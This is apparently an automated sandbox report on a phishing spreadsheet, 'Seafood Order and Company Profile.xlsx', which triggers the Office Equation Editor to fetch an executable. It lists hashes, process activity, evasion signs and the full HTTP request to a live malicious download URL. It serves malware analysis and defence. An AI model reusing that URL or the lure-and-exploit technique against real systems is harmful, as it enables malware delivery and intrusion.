Windows Analysis Report Seafood Order and Company Profile.xlsx

Overview

General Information

Sample Name: Seafood Order and Company Profile.xlsx
Analysis ID: 435320
MD5: 4c9867155a69c0e089cbf6e287442798
SHA1: 72fd5acd0ce33714c3aff9e837af3be0db733800
SHA256: 9fcc8435ac8254ae9b1dea93cff53098e94d193ea4edef5b5300e7c8f0328d2c
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Allocates a big amount of memory (probably used for heap spraying)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Seafood Order and Company Profile.xlsx ReversingLabs: Detection: 30%

Exploits:

barindex
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 64MB
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.133.109.192:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.133.109.192:80

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cbinvst/cbn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.109.192Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.109.192
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2B60F8F.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /cbinvst/cbn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.109.192Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Jun 2021 10:17:42 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Content-Length: 302Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 37 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 50 48 50 2f 37 2e 33 2e 32 38 20 53 65 72 76 65 72 20 61 74 20 31 30 33 2e 31 33 33 2e 31 30 39 2e 31 39 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Server at 103.133.109.192 Port 80</address></body></html>
Source: E2B60F8F.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

barindex
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Seafood Order and Company Profile.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal56.expl.winXLSX@2/18@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Seafood Order and Company Profile.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE2DF.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Seafood Order and Company Profile.xlsx ReversingLabs: Detection: 30%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Seafood Order and Company Profile.xlsx Static file information: File size 1315840 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Seafood Order and Company Profile.xlsx Initial sample: OLE indicators vbamacros = False
Source: Seafood Order and Company Profile.xlsx Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Seafood Order and Company Profile.xlsx Stream path 'EncryptedPackage' entropy: 7.9998536578 (max. 8.0)

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2408 Thread sleep time: -60000s >= -30000s Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 435320 Sample: Seafood Order and Company P... Startdate: 16/06/2021 Architecture: WINDOWS Score: 56 15 Multi AV Scanner detection for submitted file 2->15 17 Sigma detected: EQNEDT32.EXE connecting to internet 2->17 5 EQNEDT32.EXE 10 2->5         started        8 EXCEL.EXE 38 38 2->8         started        process3 dnsIp4 13 103.133.109.192, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 5->13 11 ~$Seafood Order and Company Profile.xlsx, data 8->11 dropped file5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.133.109.192
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://103.133.109.192/cbinvst/cbn.exe true
  • Avira URL Cloud: safe
 unknown